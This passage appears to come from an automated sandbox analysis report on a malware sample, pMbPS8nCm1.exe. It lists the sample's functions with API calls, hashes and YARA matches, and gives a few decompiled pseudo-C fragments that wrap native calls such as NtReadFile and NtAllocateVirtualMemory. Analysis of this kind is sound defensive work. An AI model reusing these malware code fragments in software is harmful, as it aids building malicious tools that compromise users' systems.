                                                                        • Associated: 00000001.00000002.248196284.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000001.00000002.248228066.0000000000403000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: GrayString
                                                                        • String ID: $!$$$$$($($($*$*$*$*$*$*$+$+$+$,$.$/$0$0$0$0$1$2$2$2$2$2$2$3$3$3$3$4$5$8$;$;$<$<$>$@$@$@$@$@$@$@$@$A$C$C$D$E$E$E$E$E$E$E$E$E$E$E$F$F$F$G$G$H$H$M$M$N$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$S$S$S$S$S$S$S$S$S$S$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$X$Y$Y$[$[$\$]$]$]$]$]$^$^$^$^$_$_$_$b$d$h$h$h$h$h$h$h$h$h$h$h$h$i$j$j$j$j$j$p$r$r$s$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$v$x$y$y$z$z${$}
                                                                        • API String ID: 215530525-3813983829
                                                                        • Opcode ID: a20dd2ac096501825b4e1dbd6b0669a7a8a94111b99e39a39b4c1cc783f996ea
                                                                        • Instruction ID: 738db344043b3e873762579cf69c501a4c4ab1b73f5b4e1bc1474440391a0222
                                                                        • Opcode Fuzzy Hash: a20dd2ac096501825b4e1dbd6b0669a7a8a94111b99e39a39b4c1cc783f996ea
                                                                        • Instruction Fuzzy Hash: C3B2171091DBEAC8DB32827C5C5C7CDAE611B27325F5843C9D1F82A2D2C7B50B86DB66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006E1072, Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 428processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 006E1250
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.248592204.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID: D
                                                                        • API String ID: 963392458-2746444292
                                                                        • Opcode ID: 9b3e3d850b0c2855c60d3277e107dfed02582ef2f5ad180b5a3d46c5d09b3e00
                                                                        • Instruction ID: be520e321fe12807a704a09826fad80d299768a01fe506babdece1b183adf62a
                                                                        • Opcode Fuzzy Hash: 9b3e3d850b0c2855c60d3277e107dfed02582ef2f5ad180b5a3d46c5d09b3e00
                                                                        • Instruction Fuzzy Hash: 38020270E01248EFEB54CF99C985BEDBBB6BF09304F244069E515AB291D770AE85EF10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006E0AB5, Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00000000,00028400,00028400,00028400), ref: 006E0BC4
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.248592204.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 726fdf02a72cddc0e4b7d9bb8ef5b949d9986ce472c5cf74e3fd224234078f3e
                                                                        • Instruction ID: 00977b7aacc2e89a2245911f771ba07a619c38794ca8dc607140db8cbcd770ec
                                                                        • Opcode Fuzzy Hash: 726fdf02a72cddc0e4b7d9bb8ef5b949d9986ce472c5cf74e3fd224234078f3e
                                                                        • Instruction Fuzzy Hash: 6631F815E54348A9DB90DBE4F852BBDB771AF48B10F20540BF908EE2E0E7B10D91D749
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 006E08EE, Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.248592204.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                                        • Instruction ID: 074182ef00fba4508cd144f3f34b3cb9fdabbf410002cc731a6c57c22f74682c
                                                                        • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                                        • Instruction Fuzzy Hash: 2211C636A11249EFEB10DFAAD8848ADF7FEEF44750B5440A5E805D3316E7B09E81C660
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006E09DE, Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.248592204.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                                        • Instruction ID: b1eab86c86486f7097befa148b762ca3c1a500a52a2b8fb82fac07928683fd9f
                                                                        • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                                        • Instruction Fuzzy Hash: BEE0927576174D9FC744CBADC841D15B3F9EB08320B1142A4FC15C73A2EA74EE40D650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006E0A1C, Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.248592204.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                        • Instruction ID: 8f8db6e9f74296bb814ef2ac07f2e33d387fb2f01bc67922352f3f5035cfcdbb
                                                                        • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                        • Instruction Fuzzy Hash: D2E086363127909FD760DA1FC480DA6F3EAEB883B07154479E849D3712C670FC42C650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006E099F, Relevance: .0, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.248592204.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Analysis Process: pMbPS8nCm1.exe PID: 5800 Parent PID: 3492 pMbPS8nCm1.exeCOMMON

                                                                        Executed Functions

                                                                        Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 37%
                                                                        			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                                        0x00418283
                                                                        0x0041828f
                                                                        0x00418297
                                                                        0x0041829c
                                                                        0x004182a2
                                                                        0x004182bd
                                                                        0x004182c5
                                                                        0x004182c9

                                                                        APIs
                                                                        • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: !:A$b=A$b=A
                                                                        • API String ID: 2738559852-704622139
                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004183AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004183AA(void* __ebx, void* __edi) {
				long _t14;

				_t10 =  *0x5543483E;
				_t3 = _t10 + 0xc60; // 0xca0
				E00418DD0(__edi,  *0x5543483E, _t3,  *((intOrPtr*)( *0x5543483E + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory( *0x55434842,  *0x55434846,  *0x5543484A,  *0x5543484E,  *0x55434852,  *0x55434856); // executed
				return _t14;
			}




                                                                        0x004183b3
                                                                        0x004183bf
                                                                        0x004183c7
                                                                        0x004183e9
                                                                        0x004183ed

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID: 6HCU
                                                                        • API String ID: 2167126740-1255677348
                                                                        • Opcode ID: a201d11073bd5dc7628d926a61bbc76284421643bd7734e75ee832c2f14c850b
                                                                        • Instruction ID: 785ee6bdb1737b7ece5f68c773e4035cb9a370b06d5a2f4bb549206f88432f0d
                                                                        • Opcode Fuzzy Hash: a201d11073bd5dc7628d926a61bbc76284421643bd7734e75ee832c2f14c850b
                                                                        • Instruction Fuzzy Hash: 4DF0F8B5200208ABCB14DF99DC81EEB77A9AF8C754F158149BE5897251D630E911CBE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418222, Relevance: 1.5, APIs: 1, Instructions: 33filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                        • Instruction ID: eb2fcad7cfbb8d36c8c07e65e7b1c2717ee67fb2c70223fbf7d83cf3cf0a7d26
                                                                        • Opcode Fuzzy Hash: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                        • Instruction Fuzzy Hash: 62F0F8B2218148AF8B44CF9CDD94CEB77ADEB8C210B14465CFA5CC7205C635E8028B64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                        • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                                                                        • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                        • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                        0x004184b7
                                                                        0x004184c2
                                                                        0x004184cd
                                                                        0x004184d1

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: &5A
                                                                        • API String ID: 1279760036-1617645808
                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                        • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                                                        • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                        • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418675, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 2b22221c3b210471ff1b8bf9103a91c95a37d647fff54dc2bc040ec3afc8e04c
                                                                        • Instruction ID: 9a823f8c78894249dba104d5ea0f087799ce9c1430a6f2244117b3d31d4b0435
                                                                        • Opcode Fuzzy Hash: 2b22221c3b210471ff1b8bf9103a91c95a37d647fff54dc2bc040ec3afc8e04c
                                                                        • Instruction Fuzzy Hash: 4B01ADB22042446FDB24DFA5DC89EEB7B68EF84350F14859DF98D5B282C930E811CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004184D4, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: bcc1ec7d6e7d6ac1d184e4638b90497378ca44e04d2126619acfb57251e404be
                                                                        • Instruction ID: ab81e3b6ab6d3b91ce71e5eff0dc86bffa658c17d00b5c940c9f491b72657ba9
                                                                        • Opcode Fuzzy Hash: bcc1ec7d6e7d6ac1d184e4638b90497378ca44e04d2126619acfb57251e404be
                                                                        • Instruction Fuzzy Hash: 24E0D8BC2442851BDB04EE69E4908E73795FF85354714994EEC9987307C534D8568BB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418512, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 122aecf94cc41ec917835493dfd9b606af23139f21e44ad84ef64d83a3c9c8b1
                                                                        • Instruction ID: dd81a4506f34eb1dc815d8e525c1c8e650a7b6415f3c6e3ee69276a5238c3cd9
                                                                        • Opcode Fuzzy Hash: 122aecf94cc41ec917835493dfd9b606af23139f21e44ad84ef64d83a3c9c8b1
                                                                        • Instruction Fuzzy Hash: 12E04F31600615BFC324DF65CC85FE33B64AF59790F0545ADF91A9B682C631A601CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418642, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 95cdc35e99a254c2aded364cd106fd50a8e26a999ed31900c700e6dd24670211
                                                                        • Instruction ID: b01ba6cf3436e3ac7ba59ad1e4c80d6b9cf1e4843ea3370bd1df8a4db748f34e
                                                                        • Opcode Fuzzy Hash: 95cdc35e99a254c2aded364cd106fd50a8e26a999ed31900c700e6dd24670211
                                                                        • Instruction Fuzzy Hash: EDE04FB12002046FDB10DF55DC84EE73769EF88350F018159F90C97281C935E8118BB4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418520, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 00408C6C, Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (
                                                                        • API String ID: 0-3887548279
                                                                        • Opcode ID: 256f9c514b5ef7632a61cc85b0f2cfa842a2cb1def4758e2bd34ed65f77ce34d
                                                                        • Instruction ID: 0ff0364cf6be1368c5f4b291029ae6b5cbfe5ea2986cd3c38f085d2a96d73519
                                                                        • Opcode Fuzzy Hash: 256f9c514b5ef7632a61cc85b0f2cfa842a2cb1def4758e2bd34ed65f77ce34d
                                                                        • Instruction Fuzzy Hash: 06021DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00408C70, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 73%
                                                                        			E00408C70(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
